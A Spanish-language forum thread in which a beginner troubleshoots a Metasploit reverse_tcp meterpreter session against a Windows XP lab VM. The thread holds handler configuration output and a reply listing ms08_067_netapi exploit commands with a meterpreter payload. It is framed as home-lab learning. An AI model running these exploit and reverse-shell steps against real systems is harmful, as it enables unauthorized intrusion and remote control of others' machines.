No consigo meterpreter pero si la shell

Iniciado por fekaa, 13 Febrero 2013, 23:41 PM

0 Miembros y 1 Visitante están viendo este tema.

fekaa

Buen día estimados.

Estoy intentando obtener la meterpreter a través de reverse_tcp en Windows desde Linux con el metasploit.

El problema es que una shell consigo obtener perfectamente. Cuando la máquina víctima ejecuta el .exe que generé anteriormente, no hay problema; si intento obtener una sesión meterpreter, la salida en el metasploit es la siguiente:

Citar
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

  Name  Current Setting  Required  Description
  ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique: seh, thread, process, none
  LHOST     192.168.1.102    yes       The listen address
  LPORT     4444             yes       The listen port


Exploit target:

  Id  Name
  --  ----
  0   Wildcard Target


msf  exploit(handler) > exploit

  • Started reverse handler on 192.168.1.102:4444
  • Starting the payload handler...
  • Sending stage (752128 bytes) to 192.168.1.110
El problema es que se queda en

  • Sending stage (752128 bytes) to 192.168.1.110[/b]

    y luego no pasa nada.

    Soy principiante, recién ayer me puse a ver todo ésto del Metasploit y la verdad me interesa muchísimo; mis intenciones no son malas en ningún lugar, por eso hago pruebas locales, simplemente para aprender a proteger mi propio equipo por empezar.

    La máquina víctima es una máquina virtual con Windows XP SP3 "pelado" (entendiéndose el término "pelado" como a un windows recién instalado, y sin ningun soft extra)

    Saludos y gracias.
"Cuanto más sabes, más te das cuenta de que no sabes nada" - Sócrates

alister

Back 2 business!

basdi

amigo intenta esto y después comenta:
use exploit /windows/smb/ms08_067_netapi
set rhost 192.xxx.x.xx (ip victima )
set payload windows/meterpreter/bind_tcp
set lhost 192.xxx.x.xx (ip atacante)
explloit
si tu sistema es xp virgen (pelado ) si no consigues el Shell lee esto quizás hay esta tu respuesta http://www.blackploit.com/2009/11/por-que-no-consigo-shell-con-mi.html